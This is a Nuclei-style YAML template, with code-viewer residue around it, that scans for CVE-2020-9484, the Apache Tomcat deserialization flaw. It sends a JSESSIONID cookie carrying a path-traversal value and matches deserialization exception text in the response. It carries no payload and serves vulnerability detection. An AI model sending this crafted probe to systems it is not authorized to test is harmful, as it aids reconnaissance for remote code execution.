26 lines
556 B
YAML
26 lines
556 B
YAML
|
id: CVE-2020-9484
|
||
|
|
||
|
info:
|
||
|
name: Apache Tomcat RCE by deserialization
|
||
|
author: dwisiswant0
|
||
|
severity: high
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
headers:
|
||
|
Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy"
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.jsp"
|
||
|
- "{{BaseURL}}:8080/index.jsp"
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 500
|
||
|
- type: word
|
||
|
words:
|
||
|
- "Exception"
|
||
|
- "ObjectInputStream"
|
||
|
- "PersistentManagerBase"
|
||
|
condition: and
|
||
|
part: body
|